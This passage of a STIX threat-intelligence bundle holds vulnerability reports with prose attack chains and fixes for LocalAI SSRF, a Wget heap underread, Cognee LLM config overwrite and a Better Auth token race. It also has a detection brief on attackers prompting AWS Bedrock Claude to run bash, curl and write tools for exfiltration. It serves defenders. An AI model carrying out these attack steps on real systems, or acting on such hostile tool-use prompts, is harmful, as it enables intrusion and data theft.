      "id": "indicator--3579df09-f22b-5ef8-980f-5efc248d6f85",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.vulncheck.com/advisories/localai-server-side-request-forgery-via-post-models-apply",
      "pattern": "[url:value = 'https://www.vulncheck.com/advisories/localai-server-side-request-forgery-via-post-models-apply']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T21:21:59Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bba74e15-ca3c-507d-a001-c1db2adb7cd3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9519ec35-4c31-5202-bbfe-5fc1b580f549",
      "target_ref": "indicator--3579df09-f22b-5ef8-980f-5efc248d6f85"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6f50a665-0c0a-58f4-968d-10fa84b6c9fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9519ec35-4c31-5202-bbfe-5fc1b580f549",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e36dde55-a247-51ae-915b-0aac12302837",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Network Service Scanning",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1046",
          "url": "https://attack.mitre.org/techniques/T1046"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dc0436d7-2ead-5748-88e5-34fd5abc7938",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9519ec35-4c31-5202-bbfe-5fc1b580f549",
      "target_ref": "attack-pattern--e36dde55-a247-51ae-915b-0aac12302837"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9519ec35-4c31-5202-bbfe-5fc1b580f549",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-59707: LocalAI Unauthenticated Server-Side Request Forgery (SSRF)",
      "description": "## Overview\n\nA critical unauthenticated server-side request forgery (SSRF) vulnerability, identified as CVE-2026-59707, exists in LocalAI versions up to and including v4.3.1. This flaw affects the `POST /models/apply` endpoint, where unsanitized gallery URL fields are directly passed to an internal function (`gallery.GetGalleryConfigFromURLWithContext`). This lack of validation allows malicious actors to coerce the LocalAI server into initiating HTTP GET requests to arbitrary internal and loopback IP addresses. Exploitation enables attackers to perform network service discovery, map internal infrastructure, and potentially leak sensitive information through partial response content in error messages, posing a significant risk for initial access and lateral movement within an affected organization's network. The vulnerability was published by NVD on July 7, 2026, with a CVSS v3.1 base score of 8.6 (High).\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker identifies an internet-facing LocalAI server instance running a vulnerable version (\u003c= v4.3.1).\n2.  **Payload Crafting**: The attacker crafts a malicious HTTP POST request targeting the `/models/apply` endpoint, embedding an internal or loopback IP address (e.g., `http://192.168.1.100/admin`, `http://localhost/metrics`) within a `gallery URL` field.\n3.  **Vulnerability Exploitation**: The LocalAI server receives the unauthenticated POST request and, due to improper input validation, passes the attacker-controlled internal URL directly to the `gallery.GetGalleryConfigFromURLWithContext` function.\n4.  **Internal Request**: The vulnerable LocalAI server is coerced into initiating an HTTP GET request to the specified internal or loopback address, effectively acting as a proxy for the attacker.\n5.  **Information Leakage**: The server attempts to connect to the internal resource. Any partial response content, HTTP status codes, or error messages generated by this internal request are returned in the response to the attacker's original POST request.\n6.  **Network Discovery**: The attacker analyzes the leaked information to identify active internal services, open ports, network topology, and accessible administrative interfaces within the victim's network.\n7.  **Further Exploitation**: Based on the discovered internal assets, the attacker can then pivot to exploit other vulnerabilities, gain unauthorized access to sensitive data, or establish a foothold for lateral movement, potentially leading to a full internal network compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-59707 allows unauthenticated attackers to perform extensive network reconnaissance of an organization's internal infrastructure. By forcing the LocalAI server to access private and loopback network ranges, attackers can discover sensitive services, internal applications, and potentially bypass network segmentation. The leakage of partial response content or error messages from these internal requests can provide critical intelligence, facilitating further targeted attacks. This can lead to unauthorized data access, privilege escalation, and lateral movement, potentially resulting in complete internal network compromise and significant data exfiltration, rated with a CVSS v3.1 base score of 8.6.\n\n## Recommendation\n\n*   Patch CVE-2026-59707 immediately by upgrading LocalAI to a version greater than v4.3.1 or applying the commit `f9b968e19d7cbc556d59dceb2e0e450b828a3fda`.\n*   Deploy the Sigma rule \"Detects CVE-2026-59707 Exploitation — LocalAI SSRF via POST /models/apply\" to your SIEM to alert on suspicious requests targeting the vulnerable endpoint.\n*   Enable comprehensive webserver logging, ensuring that `cs-uri-stem`, `cs-uri-query`, and `cs-method` are captured for all requests to LocalAI instances.\n*   Monitor network egress logs from LocalAI servers for connections to RFC1918 (private IP address) ranges or loopback addresses (127.0.0.1) that are not part of known legitimate traffic.\n",
      "published": "2026-07-07T21:21:59Z",
      "labels": [
        "server-side-request-forgery",
        "ssrf",
        "vulnerability",
        "localai",
        "web-application"
      ],
      "object_refs": [
        "indicator--c3d12f69-8681-55af-906d-780127f5b8d9",
        "indicator--cc1bd912-f0fe-509e-92ee-e004d5267b04",
        "indicator--45decfad-8399-55e5-be19-401740cfa5af",
        "indicator--3579df09-f22b-5ef8-980f-5efc248d6f85",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e36dde55-a247-51ae-915b-0aac12302837"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59707"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mudler/LocalAI"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mudler/LocalAI/commit/f9b968e19d7cbc556d59dceb2e0e450b828a3fda"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mudler/LocalAI/issues/10665"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/localai-server-side-request-forgery-via-post-models-apply"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bee7f5b4-f470-509e-8f23-9edfbcad2b74",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6722cd5d-ec1f-543b-951a-014c1f80fdc4",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6722cd5d-ec1f-543b-951a-014c1f80fdc4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-58469: GNU Wget Heap Buffer Underread Vulnerability",
      "description": "## Overview\n\nA critical heap buffer underread vulnerability, tracked as CVE-2026-58469, affects GNU Wget versions through 1.25.0. This flaw resides within the `clean_metalink_string()` function in `src/metalink.c`, which is responsible for parsing Metalink documents. A malicious server can exploit this vulnerability by delivering a specially crafted Metalink document that contains a URL consisting entirely of whitespace characters. When Wget processes this malformed input, the vulnerable function attempts to decrement a pointer beyond the beginning of the allocated buffer, leading to a heap buffer underread. This memory corruption can trigger abnormal program behavior, potentially resulting in a denial-of-service condition for the Wget process or, under specific circumstances, arbitrary code execution. The vulnerability has been addressed in commit `37a40fc` and impacts any system utilizing vulnerable versions of GNU Wget to retrieve Metalink files. Defenders should prioritize patching to mitigate this risk.\n\n## Attack Chain\n\n1.  A victim system running a vulnerable version of GNU Wget (through 1.25.0) attempts to download a Metalink document. This action could be initiated by a user, an automated script, or another program.\n2.  The `wget` process connects to a malicious server configured to serve crafted content.\n3.  The malicious server responds by sending a specially crafted Metalink document to the `wget` client.\n4.  This Metalink document contains a URL entry that consists solely of whitespace characters (e.g., spaces, tabs).\n5.  GNU Wget receives the document and begins parsing its content to extract download information.\n6.  During parsing, Wget invokes the `clean_metalink_string()` function (located in `src/metalink.c`) to process the malformed whitespace-only URL.\n7.  The `clean_metalink_string()` function attempts to modify the pointer for the URL, but due to the all-whitespace input, it decrements the pointer past the legitimate start of its allocated heap buffer.\n8.  This operation results in a heap buffer underread, corrupting memory within the `wget` process and leading to abnormal program termination or other undefined behavior.\n\n## Impact\n\nThe observed impact of CVE-2026-58469 is memory corruption, specifically a heap buffer underread. This can lead to abnormal program behavior, most commonly manifesting as a denial-of-service (DoS) condition where the GNU Wget process crashes or becomes unresponsive. While the primary identified impact is DoS, memory corruption vulnerabilities like this can, in some advanced exploitation scenarios, be leveraged to achieve arbitrary code execution, granting an attacker further control over the compromised system. The CVSS 3.1 Base Score of 7.5 (High) reflects the significant availability impact this vulnerability poses, particularly given Wget's widespread use in scripting and automated systems.\n\n## Recommendation\n\n*   Apply the patch associated with commit `37a40fc` or upgrade GNU Wget to a version newer than 1.25.0 to remediate CVE-2026-58469.\n",
      "published": "2026-07-07T21:20:38Z",
      "labels": [
        "vulnerability",
        "memory-corruption",
        "wget",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58469"
        },
        {
          "source_name": "reference",
          "url": "https://gitlab.com/gnuwget/wget/-/commit/37a40fcb450153f69537c7cbc2a7a4fb0b6f7826"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/gnu-wget-heap-buffer-underread-via-metalink-url-parsing"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4b63d302-564d-52c7-8bad-1939833a840c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d8a0ac70-9de3-5833-9444-028b33f47387",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d8a0ac70-9de3-5833-9444-028b33f47387",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-58473 – Cognee Improper Access Control Leading to LLM Config Overwrite",
      "description": "## Overview\n\nA critical improper access control vulnerability, CVE-2026-58473, has been identified in Cognee software versions prior to 1.2.0. This flaw permits unauthenticated attackers to bypass security checks, primarily by self-registering an account and then accessing the `/settings` API endpoint without a necessary administrator or superuser validation. Exploiting this vulnerability allows attackers to overwrite the global Large Language Model (LLM) provider configuration. By manipulating the process-wide singleton configuration cache, all LLM operations across the entire Cognee instance can be redirected to an attacker-controlled endpoint. This redirection facilitates the exfiltration of highly sensitive data, including user prompts, uploaded documents, extracted entities, and knowledge graph content, from all users interacting with the affected Cognee instance.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a Cognee instance vulnerable to CVE-2026-58473 (version \u003c 1.2.0) exposed on the internet.\n2.  The attacker exploits the improper access control to self-register a new user account on the Cognee platform, bypassing any intended authorization checks for account creation.\n3.  Using the newly created account, the attacker makes a request to the Cognee `/settings` API endpoint, which lacks proper validation for administrative privileges.\n4.  The attacker leverages this endpoint to modify the global LLM provider configuration, overwriting its values within the process-wide singleton configuration cache.\n5.  This malicious configuration redirects all subsequent LLM operations, including user prompts and data uploads, to an attacker-controlled server or endpoint.\n6.  As legitimate users interact with Cognee, their sensitive data (prompts, uploaded documents, extracted entities, knowledge graphs) is sent to the attacker's server.\n7.  The attacker collects and exfiltrates this sensitive information, effectively intercepting all LLM-related data processed by the Cognee instance.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-58473 leads to severe data breaches across the entire Cognee instance. All data processed by the LLM component, including highly sensitive user prompts, uploaded documents, extracted entities, and derived knowledge graph content, is susceptible to exfiltration. Any organization utilizing Cognee before version 1.2.0 could have their intellectual property, confidential communications, and proprietary information compromised. The vulnerability impacts all users of the affected instance, as the configuration change is global, potentially exposing an entire organization's LLM interactions and data to unauthorized third parties.\n\n## Recommendation\n\n*   **Patch CVE-2026-58473 immediately** by upgrading all Cognee instances to version 1.2.0 or higher.\n*   Review webserver access logs for Cognee for any unusual or unauthorized account registrations followed by calls to the `/settings` endpoint from newly created or suspicious accounts.\n*   Implement API gateway or WAF rules to restrict access to sensitive endpoints like `/settings` based on source IP, known administrative roles, or multi-factor authentication, independent of the application's internal access controls.\n",
      "published": "2026-07-07T21:19:45Z",
      "labels": [
        "vulnerability",
        "access-control",
        "data-exfiltration",
        "llm",
        "cognee"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58473"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5b0d73b5-eb76-55d0-a7cb-245b2f5ca5f5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b67789d2-ca28-5059-be3a-694a91521cd6",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ef49edb-94d7-5032-9ce1-22d917ae63a7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Process Injection",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1055",
          "url": "https://attack.mitre.org/techniques/T1055"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--16bc813e-bad9-5f70-8264-7be79ad1415f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b67789d2-ca28-5059-be3a-694a91521cd6",
      "target_ref": "attack-pattern--5ef49edb-94d7-5032-9ce1-22d917ae63a7"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9decaa7f-8d7f-543b-aee8-a92a3adcc15c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b67789d2-ca28-5059-be3a-694a91521cd6",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4d9da7aa-c37d-59a0-8c1e-591b58d0e0f8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b67789d2-ca28-5059-be3a-694a91521cd6",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--32aeb3f8-80b1-59eb-967e-64d23a4b1b08",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b67789d2-ca28-5059-be3a-694a91521cd6",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b67789d2-ca28-5059-be3a-694a91521cd6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS Bedrock Claude High-Risk Filesystem and Exec Tool Invocation Detection",
      "description": "## Overview\n\nThis threat brief focuses on the detection of malicious or unauthorized use of AWS Bedrock Claude's tool invocation capabilities. Threat actors, having potentially compromised AWS credentials, may leverage Bedrock Claude to execute high-risk commands and interact with the underlying AWS environment. Specifically, the detection targets invocations of tools such as `bash`, `curl`, `edit`, `write`, `webfetch`, `grep`, `read`, or `read_file` through the AI model. This activity, especially when involving combinations like `bash` and `curl` (suggesting download-and-execute capabilities) or `bash` and `write` (for persistence), can indicate attempts to escalate privileges, exfiltrate sensitive data, or perform unauthorized system modifications. This detection focuses on identifying deviations from an identity's historical baseline behavior, highlighting the misuse of legitimate AI functionalities for malicious purposes.\n\n## Attack Chain\n\n1.  **Initial Access / Credential Compromise:** An attacker obtains valid AWS credentials, possibly through phishing, exposed access keys, or compromise of an EC2 instance or other AWS resource.\n2.  **Access to AWS Bedrock:** The attacker utilizes the compromised AWS credentials to authenticate and interact with AWS Bedrock Claude, leveraging its API or SDK.\n3.  **Tool Invocation Prompting:** The attacker crafts sophisticated prompts to the Claude model, specifically instructing it to use its integrated tool-use capabilities to invoke high-risk system commands or file manipulation utilities.\n4.  **Command Execution / Data Staging:** Claude, acting on the malicious prompt, executes tools like `bash` to run shell commands, `curl` to fetch external payloads or exfiltrate data, or `write` to create or modify files for persistence or staging.\n5.  **Reconnaissance / Privilege Escalation:** The attacker employs tools like `grep` or `read_file` via Claude to discover sensitive information, configurations, or credentials that can be used to further escalate privileges within the AWS environment.\n6.  **Impact \u0026 Exfiltration:** Having gained elevated privileges or access to sensitive data, the attacker uses `curl` or `webfetch` to exfiltrate collected data to external C2 infrastructure or performs disruptive actions like resource deletion.\n\n## Impact\n\nThe successful exploitation of AWS Bedrock Claude's tool invocation capabilities can lead to significant compromise of an organization's AWS infrastructure. Attackers can leverage the AI model to escalate privileges, exfiltrate sensitive data such as customer information, intellectual property, or access keys, and establish persistence within the environment. This can result in severe data breaches, service disruptions, compliance violations, and substantial financial and reputational damage. The misuse of an AI model's capabilities complicates traditional security monitoring, as malicious activity originates from what appears to be a legitimate service invocation.\n\n## Recommendation\n\n*   Enable AWS Bedrock model invocation logging to ensure detailed Claude request/response payloads are delivered to S3 or CloudWatch Logs as detailed in the AWS documentation `https://docs.aws.amazon.com/bedrock/latest/userguide/model-invocation-logging.html`.\n*   Ingest AWS Bedrock Claude logs into your security information and event management (SIEM) platform, ensuring logs are properly parsed for fields like `tool_called` and `identity.arn`.\n*   Deploy the `AWS Bedrock Claude High-Risk Tool Invocation` Sigma rule to your SIEM and tune it against known legitimate developer activity or automation that might use these tools via Bedrock Claude, as mentioned in the `falsepositives` section of the rule.\n*   Regularly review identities (`identity.arn`) that interact with AWS Bedrock Claude, especially those with `assumed_role` identities, and restrict their permissions to only necessary tools.\n",
      "published": "2026-07-07T21:15:40Z",
      "labels": [
        "cloud",
        "aws",
        "ai",
        "llm",
        "bedrock",
        "tool-invocation",
        "privilege-escalation",
        "data-exfiltration",
        "anomaly-detection"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5ef49edb-94d7-5032-9ce1-22d917ae63a7",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://aws.amazon.com/blogs/apn/unlocking-the-power-of-splunk-with-amazon-bedrock-an-agentic-ai-approach-to-build-customized-splunk-assistants-using-bedrock-agents/"
        },
        {
          "source_name": "reference",
          "url": "https://help.splunk.com/en/splunk-observability-cloud/observability-for-ai/splunk-ai-infrastructure-monitoring/set-up-ai-infrastructure-monitoring/amazon-bedrock"
        },
        {
          "source_name": "reference",
          "url": "https://research.splunk.com/stories/aws_bedrock_security/"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/bedrock/latest/userguide/model-invocation-logging.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Use Alternate Authentication Material",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1550",
          "url": "https://attack.mitre.org/techniques/T1550"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e28f11c6-8fa7-5f04-965f-4d89d4c7a0cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--83bfea46-609f-5658-a920-8d59364733eb",
      "target_ref": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--83bfea46-609f-5658-a920-8d59364733eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Better Auth OAuth Refresh Token Race Condition (CVE-2026-53517)",
      "description": "## Overview\n\nA critical race condition (CVE-2026-53517) has been identified in the `@better-auth/oauth-provider` (versions \u003e= 1.6.0, \u003c 1.6.11) and `better-auth` (versions \u003e= 1.4.8-beta.7, \u003c 1.6.0) libraries. This vulnerability, affecting OAuth 2.0 refresh token rotation, permits an attacker to obtain indefinite unauthorized access by repeatedly refreshing a stolen token. The flaw occurs when concurrent requests attempt to redeem the same refresh token, bypassing the intended single-use and family invalidation mechanisms due to a non-atomic read/revoke operation. This allows forked refresh token families to be created, enabling attackers to bypass detection and session expiration policies. This vulnerability is particularly critical for applications that use the `offline_access` scope and serve client applications (SPAs, mobile apps) that might share refresh tokens across multiple instances or retry requests.\n\n## Attack Chain\n\n1.  An attacker obtains a valid refresh token for a user, potentially through client-side exploits like XSS, malware, or a compromised client application.\n2.  The attacker sends a request to the vulnerable `/oauth2/token` endpoint to redeem the stolen refresh token and obtain a new access token and a new refresh token.\n3.  Concurrently, before the first token redemption request fully completes its revocation and minting sequence, the attacker sends a second request to the `/oauth2/token` endpoint using the *same original, stolen* refresh token.\n4.  Due to the non-atomic nature of the `read / validate / revoke / mint` sequence on the `oauthRefreshToken` row, both concurrent requests successfully pass the initial revocation check.\n5.  Each of these concurrent requests independently mints a new, valid refresh token, resulting in two or more distinct, valid \"forked\" refresh tokens originating from the single parent token.\n6.  The attacker now possesses multiple valid refresh tokens, each capable of independently minting new access tokens. This circumvents the intended single-use and family invalidation mechanisms.\n7.  The attacker can use these continually refreshed tokens to maintain unauthorized access to resources for an indefinite period, exfiltrate sensitive data, or perform unauthorized actions within the original user's authorization scope, surviving past any single revocation attempt.\n\n## Impact\n\nThe vulnerability (CVE-2026-53517) allows an attacker with a stolen refresh token to gain indefinite unauthorized access to an affected application. This means that even if a legitimate user attempts to revoke their session, an attacker holding a forked refresh token branch can continue to mint new access tokens, effectively bypassing revocation and detection mechanisms. This leads to persistent unauthorized access at the original user's authorization scope, which can result in severe data breaches, unauthorized modifications, or service disruption. All applications utilizing `@better-auth/oauth-provider` versions `\u003e= 1.6.0, \u003c 1.6.11` or `better-auth` versions `\u003e= 1.4.8-beta.7, \u003c 1.6.0` with the `offline_access` scope are potentially affected.\n\n## Recommendation\n\n*   Upgrade `@better-auth/oauth-provider` to version `1.6.11` or later immediately to apply the patch for CVE-2026-53517.\n*   If immediate upgrade to `@better-auth/oauth-provider@1.6.11` is not possible, disable refresh tokens by ensuring no client requests the `offline_access` scope, though this will break long-lived sessions.\n*   If `offline_access` cannot be disabled, consider configuring the database adapter to run the OAuth refresh handler under serializable isolation or wrap `adapter.update` on `oauthRefreshToken` with a row-level pessimistic lock, as described in the workarounds for CVE-2026-53517.\n*   Implement schema migration `CREATE UNIQUE INDEX oauth_refresh_token_token_uniq ON \"oauthRefreshToken\" (token);` to gain a unique constraint on `oauthRefreshToken.token` for applications using affected versions of `@better-auth/oauth-provider` or `better-auth`.\n",
      "published": "2026-07-07T21:07:14Z",
      "labels": [
        "race-condition",
        "oauth",
        "authentication",
        "vulnerability",
        "npm",
        "github",
        "better-auth"
      ],
      "object_refs": [
        "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-392p-2q2v-4372"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/362.html"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/367.html"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/294.html"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/613.html"
        },
        {
          "source_name": "reference",
          "url": "https://datatracker.ietf.org/doc/html/rfc9700#section-4.14"
        },
        {
          "source_name": "reference",
          "url": "https://datatracker.ietf.org/doc/html/rfc6749#section-6"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d3a58f2c-9521-50dc-be06-a5f640e2a92c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steal Application Access Token",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1528",
          "url": "https://attack.mitre.org/techniques/T1528"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--955b5b98-6263-5ce0-a22a-3e28eb13e7cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f165efc3-884f-59fd-a10a-ebbf479e2e27",
      "target_ref": "attack-pattern--d3a58f2c-9521-50dc-be06-a5f640e2a92c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2db04d6a-5b80-58ea-b325-5f03b44ffd8a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f165efc3-884f-59fd-a10a-ebbf479e2e27",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f165efc3-884f-59fd-a10a-ebbf479e2e27",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "@better-auth/oauth-provider Concurrent Redemption Race Condition (CVE-2026-53518)",
